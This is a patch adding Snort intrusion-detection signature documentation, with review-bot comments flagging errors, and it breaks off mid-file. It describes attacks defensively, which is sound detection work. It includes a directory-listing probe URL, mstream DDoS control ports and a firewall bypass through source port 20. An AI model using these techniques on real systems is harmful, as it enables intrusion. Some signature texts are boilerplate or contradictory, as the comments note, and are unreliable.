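Review bot: Impact lists "Denial of Service is possible" but nothing in Detailed Information or Attack Scenarios mentions a DoS condition; either document it or drop it from Impact. As with the generic web-server files in this patch, the text does not say which ColdFusion resource sid 913 matches, so the analyst cannot relate the alert to a specific exposed file. Inconsistent spelling: "Coldfusion" in Detailed Information versus "ColdFusion" elsewhere.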
--- /dev/null
+++ b/doc/signatures/100000450.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000450
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "VanillaSoft Helpdesk" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "username" parameter in the "default.asp" 
+script used by the "VanillaSoft Helpdesk" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using VanillaSoft Helpdesk
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
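Review bot: Impact is the server-compromise template ("administrative access to the server", "execution of arbitrary code"), while Attack Scenarios describes only a malicious link that steals information from the user who clicks it; for a cross-site scripting flaw in the "username" parameter of "default.asp" the sections should agree that the harm lands in the victim's browser (session token theft, actions performed as that user). Corrective Action lists only patching; add output encoding of the parameter and input validation in the application. Formatting: the "--" after "Sid:", "Affected Systems:" and "Contributors:" lack the preceding blank line used elsewhere, and "attackers choosing" should be "attacker's choosing".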
--- /dev/null
+++ b/doc/signatures/3243.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3243
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
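Review bot: fourth copy of the RPC DCOM text (with sids 3168, 3327 and 3439 in this patch), carrying the same inconsistency between Attack Scenarios (overly long filename via a network share) and Detailed Information (malformed RPC DCOM request) and the same "Expoit" typo; the four files should each say what their rule matches and share a corrected body.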
--- /dev/null
+++ b/doc/signatures/503.txt
@@ -0,0 +1,67 @@
+Rule:  
+
+--
+Sid:
+503
+
+--
+Summary:
+This event is generated when possible non-legitimate traffic is detected
+that should not be allowed through a firewall.
+
+--
+Impact:
+This can be used to pass through a poorly configured firewall.
+
+--
+Detailed Information:
+Traffic from port 20 is normally FTP traffic.  Commands are passed to an
+FTP server over port 21.  In order to download files, a client tells the
+FTP server to connect to the client on port 'X' where 'X' is a port 
+above 1023.  The FTP server then connects to the client on the given 
+port using the source port of 20.  Ports below 1024 are privileged, a 
+legitimate connection from an ftp server should always be to a port 
+above 1023.  Some misconfigured firewalls may blindly allow connections 
+to any port from a source port of 20.
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+An attacker could use a source port of 20 for TCP connections to bypass 
+a poorly configured firewall.  
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Connections from port 20 should only be allowed to ports >=1024.  A 
+better solution would be block this traffic entirely and force FTP 
+clients inside the firewall to use PASV mode.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS06
+
+--
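Review bot: Corrective Action "A better solution would be block this traffic entirely" is missing "to"; the recommendation is the right one for the reason Detailed Information gives, since a stateful firewall should admit FTP data connections only as part of a tracked control session, never because the source port happens to be 20. Detailed Information could say directly that the rule fires on source port 20 to a destination port below 1024; at present "Ports below 1024 are privileged, a legitimate connection from an ftp server should always be to a port above 1023" is a comma splice and leaves the reader to infer that. Formatting: "Rule:  " and "-- " trailing spaces, a stray blank line after "Affected Systems:", and the Contributors line is missing a space before "<alexander.s@mccd.edu>".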
--- /dev/null
+++ b/doc/signatures/111-5.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+111-5
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown.
+
+--
+Detailed Information:
+This event indicates that the pre-processor stream4 has detected a
+packet with only the SYN flag set that contains a payload. A packet with
+this flag set is meant to only set up a session between a client and
+server. Any data in a packet of this kind indicates malicious activity
+is taking place.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker can attempt to evade an IDS by sending a malicious payload
+in a packet designed to set up a session.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
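Review bot: Detailed Information says "Any data in a packet of this kind indicates malicious activity is taking place", which is stronger than the Summary ("may constitute an attack") and Impact ("Unknown") and stronger than a False Positives entry of "None Known." can support; a payload in a SYN is unusual but not by itself proof of an attack, so either tone the sentence down to match the Summary or have False Positives say when a legitimate stack might send it. Corrective Action is generic; for an evasion attempt the useful step is to check whether the target host accepted the payload (the session continued) rather than its patch level. Formatting: stray blank line between "-- " and "Corrective Action:", "pre-processor" is normally written "preprocessor", and several "-- " lines carry trailing spaces.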
--- /dev/null
+++ b/doc/signatures/1189.txt
@@ -0,0 +1,75 @@
+Rule:  
+
+--
+Sid:
+1189
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in some versions of Netscape Enterprise Server.
+ 
+--
+Impact:
+Information leak which could provide an attacker with the data needed to
+launch further attacks or gain more detailed information about your web server.
+
+--
+Detailed Information:
+A user can see a directory listing by appending a Web Publishing command
+to the end of a directory URL, for example: "http://www.sun.com/?wp-stop-ver".
+
+This exploit will work on Netscape Enterprise Server regardless of
+directory indexing settings.  
+
+It will not work on iPlanet Web Server if directory indexing is set to
+"none" or "fancy" (the default). Web Publishing need not be enabled for
+this exploit to work.
+
+--
+Affected Systems:
+	Netscape Enterprise Server 3.0, 3.51 and 3.6
+
+-- 
+Attack Scenarios:
+The gathering of information such as directory listings is valuable when
+planning to attack a web server. 
+
+--
+Ease of Attack:
+Simple. No exploit software required however, an automated tool for
+scanning exists as does an exploit script.
+
+--
+False Positives:
+A web server that uses URLs which contain web publishing commands.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable directory indexing. For earlier versions of Netscape Enterprise
+Server, this may not fix the problem. On iPlanet, you can also change
+the indexing type to "fancy".
+
+To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8.
+
+--
+Contributors:
+Snort documentation contributed by Kevin Peuhkurinen
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+iPlanet Knowledge Base Article 4302:
+http://knowledgebase.iplanet.com/ikb/kb/articles/4302.html 
+
+iPlanet Knowledge Base Article 7761:
+http://knowledgebase.iplanet.com/ikb/kb/articles/7761.html 
+
+--
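Review bot: Corrective Action refers to a `potential DOS vulnerability` (`To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8.`) that no other section mentions; Impact describes only an information leak. Either describe the denial-of-service condition under Impact and Detailed Information or drop that sentence. The example URL `http://www.sun.com/?wp-stop-ver` names a real third-party host; use a placeholder such as example.com. The Ease of Attack sentence also needs splitting: `Simple. No exploit software required however, an automated tool for scanning exists as does an exploit script.` reads better as `Simple. No exploit software is required; however, an automated scanning tool and an exploit script exist.`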
--- /dev/null
+++ b/doc/signatures/246.txt
@@ -0,0 +1,64 @@
+Rule:
+--
+Sid:
+246
+
+--
+Summary:
+This event is generated when an mstream agent responds to an mstream handler's "ping" request.
+
+--
+Impact:
+Severe.  If the listed source IP is in your network, it may be an mstream agent.  If the listed destination IP is in your network, it may be an mstream agent.
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack.  There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack.  A handler can probe to see if an agent is active by sending it a UDP packet to destination port 10498 with a string of "ping" in the payload.  An active agent will reply with a UDP packet to destination port 6838 with a string of "pong" in payload.
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+A mstream agent may respond with a "pong" to a "ping" request from a handler. 
+
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+There are other known agent-to-handler ports in addition to 6838.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+NAI:
+http://vil.nai.com/vil/content/v_98662.htm
+SecurityFocus:
+http://www.securityfocus.com/archive/82/58040
+CERT:
+http://www.cert.org/incident_notes/IN-2000-05.html
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+--
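Review bot: the second sentence of Impact has the traffic direction wrong. Detailed Information says the agent answers the handler (`An active agent will reply with a UDP packet to destination port 6838 with a string of "pong"`), so the destination of a matching packet is the handler, not another agent: `If the listed destination IP is in your network, it may be an mstream agent.` should end `... it may be an mstream handler.` Minor: `Rule:` is followed directly by `--` without the blank line the other files use.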
--- /dev/null
+++ b/doc/signatures/100000379.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000379
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_mass_email.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_mass_email.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
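Review bot: the third Detailed Information paragraph and the Attack Scenarios section are generic CGI authentication boilerplate (`Some applications do not perform stringent checks when validating the credentials of a client host` / `An attacker can access an authentication mechanism and supply his/her own credentials`) and do not describe a remote file include. For this rule the scenario is an attacker supplying the URL of a server they control in `phpbb_root_path` so that `admin_mass_email.php` includes and executes code from it; replace those paragraphs with text that says so. Typos: `ona web server` and the redundant `an exploitation attempt has been attempted` (say `an exploitation attempt has been made`).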
--- /dev/null
+++ b/doc/signatures/797.txt
@@ -0,0 +1,62 @@
+
+Rule:  
+
+--
+Sid:
+797
+
+--
+Summary:
+This rule has been placed in deleted.rules. It has been superceded by
+sid 721.
+
+--
+Impact:
+Mail worms may spread rapidly because users execute them.
+
+--
+Detailed Information:
+Windows systems are often configured not to display file extensions.
+By adding a second extension, users get confused and think that an
+executable is a picture - e.g. niceboy.jpg.vbs gets displayed as
+nicegboy.jpg but is a visual basic script and not a picture.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Famous worms (ILOVEYOU, KOURNIKOVA) are based on this method.
+
+--
+Ease of Attack:
+Very easy. One needs to attach a file and hope that it gets executed.
+
+--
+False Positives:
+None Known
+Could be an error on sender's side.
+
+--
+False Negatives:
+None Known
+-
+
+--
+Corrective Action:
+Use antivirus software. Configure mail clients securely, especially when
+using windows desktops. Educate your mail users. Deny all attachments at
+the gateway if you can.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by tobias.haecker@to.com
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+See websites of antivirus companies.
+
+--
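Review bot: False Positives contradicts itself (`None Known` immediately followed by `Could be an error on sender's side.`); keep one statement. Since the Summary says the rule was moved to deleted.rules in favour of sid 721, the remaining sections should either be trimmed or say that they describe the superseding rule. Affected Systems is empty and there is a stray `-` line after `None Known` under False Negatives. Typos: `superceded` (superseded), and the example filename changes between `niceboy.jpg.vbs` and `nicegboy.jpg`.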
--- /dev/null
+++ b/doc/signatures/100000794.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000794
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "line2" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
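Review bot: Impact and the second Detailed Information paragraph overstate a cross site scripting issue. `Possible unauthorized administrative access to the server` and `execute system binaries or malicious code of the attackers choosing` describe server-side code execution, but script injected through the `line2` parameter of `blogroll.php` runs in the victim's browser; the realistic impact is theft of session cookies or credentials, content injection and phishing, which is what the Attack Scenarios section already says. Rewrite Impact to match. Formatting: the `--` separators after `100000794`, after `All systems running CGI applications using Pivot` and after the contributors lack the blank line used elsewhere.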
--- /dev/null
+++ b/doc/signatures/544.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+--
+Sid:
+544
+
+--
+Summary:
+This event is generated when an attempt is made to retrieve a file named
+"1mb" from an ftp server.
+
+--
+Impact:
+Possible abuse ftp behavior by hordes of warez sites, and the
+existance of (potentially) illegal files/software on an ftp server.
+
+--
+Detailed Information:
+Warez sites have been known to name "warez" files by their size.  Large
+files are split into smaller, more manageable chunks, and allow warez
+sites to store large files on ftp sites in a semi-organized manner.
+Once these files are uploaded, it is common practice for other warez
+users to attempt to retrieve them.
+
+--
+Affected Systems:
+ All FTP servers
+
+--
+Attack Scenarios:
+As part of an attempt to store elite warez on an ftp server, an
+attacker named the file "1mb" to indicate it's size.  This file is
+likely part of an archive that represents a larger, most likely
+illegal copy of media.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required
+
+--
+False Positives:
+If a legitimate user has a legitimate file named "1mb", this rule may
+generate an event.
+
+--
+False Negatives:
+This will detect only files named 1mb.  If a warez site decides to
+start naming their files in a different way this rule will not generate
+an event.
+
+--
+Corrective Action:
+Inspect the ftp server for a file named 1mb. If it exists, determine
+if the file is legitimate, or if it was deposited by someone attempting
+to use the server to distribute non-legitimate files.
+
+Furthermore, evaluate the need for ftp write access.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
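Review bot: the Impact sentence is not grammatical: `Possible abuse ftp behavior by hordes of warez sites, and the existance of (potentially) illegal files/software on an ftp server.` Suggest `Possible abuse of the FTP server by warez sites, and the existence of (potentially) illegal files or software on it.` Also `it's size` should be `its size`, and the Ease of Attack line is missing its full stop.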
--- /dev/null
+++ b/doc/signatures/2744.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2744
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_site_priority
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
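Review bot: the sentence naming the vulnerable procedure is broken across lines so that one line starts with a bare full stop: `vulnerability in the procedure alter_site_priority` / `. This procedure is included in` / `dbms_repcat.` Rejoin it as `vulnerability in the procedure alter_site_priority. This procedure is included in dbms_repcat.` Also `Oracle Oracle9i` repeats the vendor name, and the Corrective Action line lacks a full stop.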
--- /dev/null
+++ b/doc/signatures/2984.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2176
+
+--
+Summary:
+This event is generated when an attempt is made to access a system
+file via SMB. 
+
+--
+Impact:
+Serious. This file contains important operating system information.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to access a file
+containing important operating system information using SMB across the
+network.
+
+--
+Affected Systems:
+Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If this file is accessible via SMB the attacker can manipulate the
+operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
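Review bot: the Sid field does not match the file name. The file is `doc/signatures/2984.txt` but the body says `Sid:` / `2176`; one of the two is wrong and a lookup by sid will land on the wrong document, so fix whichever is incorrect. The text also never names the file the rule matches (`an attempt is made to access a system file via SMB`, `This file contains important operating system information`), so a reader cannot tell what triggered the event; name it and tie it to the registry access the Attack Scenarios and references describe. The CVE link uses the old candidate prefix `CAN-1999-0562`; write it as CVE-1999-0562.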
--- /dev/null
+++ b/doc/signatures/2702.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+2702
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+--
+Affected Systems:
+	Oracle iSQLPlus
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
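Review bot: Detailed Information is the shared Oracle buffer-overflow boilerplate and never identifies the vulnerable component, yet Attack Scenarios refers to `the procedure in question`, which was never named. Add a sentence stating which package, procedure or request the rule matches, as 2744.txt does with its `alter_site_priority` sentence. Affected Systems lists `Oracle iSQLPlus`, which is a web front end rather than a database package, so that section and the overflow description should be reconciled.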
--- /dev/null
+++ b/doc/signatures/100000527.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000527
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "AssoCIateD" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "menu" parameter in the "index.php" script used 
+by the "AssoCIateD" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using AssoCIateD
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
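Review bot: as with the other cross site scripting entries in this patch, Impact claims `Possible unauthorized administrative access to the server` and `execution of arbitrary code`, and Detailed Information adds `execute system binaries`; script injected through the `menu` parameter of `index.php` executes in the victim's browser, so state the client-side impact (session or credential theft, content injection) that Attack Scenarios already describes. The `--` separators after `100000527`, after the Affected Systems line and after the contributors lack the blank line used elsewhere.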
--- /dev/null
+++ b/doc/signatures/1410.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1410
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
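Review bot: nothing in this file is specific to sid 1410. Summary says `a known vulnerability in a CGI web application` without naming the application or script, Affected Systems is `All systems running CGI applications`, and `Simple. Exploits exist.` cannot be checked against an unnamed target. Add the script and parameter the rule matches and a reference for the vulnerability. Typo: `ona web server`.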
--- /dev/null
+++ b/doc/signatures/646.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 646
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing Sparc Solaris/SunOS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS355
+
+--
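Review bot: the Affected Systems section is missing entirely, although Detailed Information narrows the rule to `Sparc Solaris/SunOS network services`; add it. False Positives says `legitimate traffic to the specified port`, but no port is given anywhere in the file. Formatting and typos: `Sid: 646` is on one line where every other file puts the number on the following line, `Unkown` should be `Unknown`, and `execute  attacker-controlled` has a double space.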
--- /dev/null
+++ b/doc/signatures/2293.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2293
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
